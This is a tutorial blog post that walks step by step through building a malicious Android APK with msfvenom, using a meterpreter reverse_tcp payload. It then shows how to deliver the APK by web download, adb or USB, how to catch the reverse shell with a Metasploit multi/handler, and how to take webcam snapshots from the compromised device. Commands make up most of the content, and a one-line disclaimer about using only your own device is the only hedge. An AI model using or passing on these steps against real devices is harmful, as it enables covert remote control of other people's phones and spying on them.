Android Reverse Shell using Metasploit

Android Reverse Shell using Metsploit would guide you in Getting complete access of device (both rooted & non-rooted) remotely. Word of caution, never try to use this for any harmful illegal activity , be sensible and use this with only your own device.


Today we will see how to obtain reverse shell (command line access to victim device) using Metasploit and MSFVenom. Metasploit is a framework built in KaliLinux distribution, it is capable of doing lot many things to learn security in offensive way. Lets get started:

1. Setting up Environment :

  • Get a Android Phone / Tablet (Rooted or non Rooted both would work)
  • Have a laptop running Either host as KaliLinux or Virtual OS inside a Virtual Box / VMWare Player or Fusion or Workstation.
  • Connect both devices in same WiFi network. If its a Virtual KaliLinux OS, make the network adapter into Bridge mode.


2. Creating malicious Android apk :

  • Launch Terminal window from KaliLinux and first check for IP Address of KaliLinux machine (in my case it is


  • Now using MSFVenom to generate malicious apk,
    -p stands for payload type reverse_tcp which means we want to force victim to initiate communication facing our side (this is to bypass basic firewall checks),
    lhost should be our local IP address of KaliLinux machine,
    lport is where we would receive connection, we can choose any free local port,
    R > specifies we want to save the app in Raw format with particular location and name specified next.
msfvenom -p android/meterpreter/reverse_tcp  lhost=  lport=4545  R > /var/www/html/androidapp.apk

So now we have generated malicious apk named androidapp.apk


3. Distributing malicious apk :

  • Method 1: via Download Link over Wifi: From KaliLinux terminal run following command with root privilege to enable webserver.
service apache2 start

Now from Android mobile open any browser and type KaliMachine_IP/androidapp.apk   i.e. ( )  in URL address Bar. Download it from here and install the app by tapping on the apk from any FileExplorer.


  • Method 2: Connecting Android mobile device via USB with ADB commandline.
adb install androidapp.apk


  • Method 3: Connecting Android mobile device via USB without ADB commandline. Connect Android as media storage and copy the apk into SDCard of your mobile device. Tap and install the app. (You can even share the apk via bluetooth and then tap to install)


4. Creating Multi Handler to listen incoming connections :

  • From KaliLinux terminal with root privilege launch MSFconsole


  • Now after MSFconsole starts type use exploit/multi/handler.
use exploit/multi/handler
  • Now we need to set Local IP, Local Port & Payload which we used earlier in MSFVenom
    set LHOST
    set LPORT 4545
    set PAYLOAD android/meterpreter/reverse_tcp

All set now.


5. Successful Reverse shell :

The moment we launch our installed AndroidApp (renamed as MainActivity  after installation) with green Android icon   OR  use command line:  adb shell am start -n com.metasploit.stage/.MainActivity , we would get reverse shell in KaliLinux terminal running multi handler.

On getting meterpreter reverse shell, run following commands:

webcam_snap -i 1


Report Errors + Bugs & Become Insider for

We would like to hear you, if you find any error or misspelled phrase while reading our tutorials. By reporting mistakes through email to you could help other peers.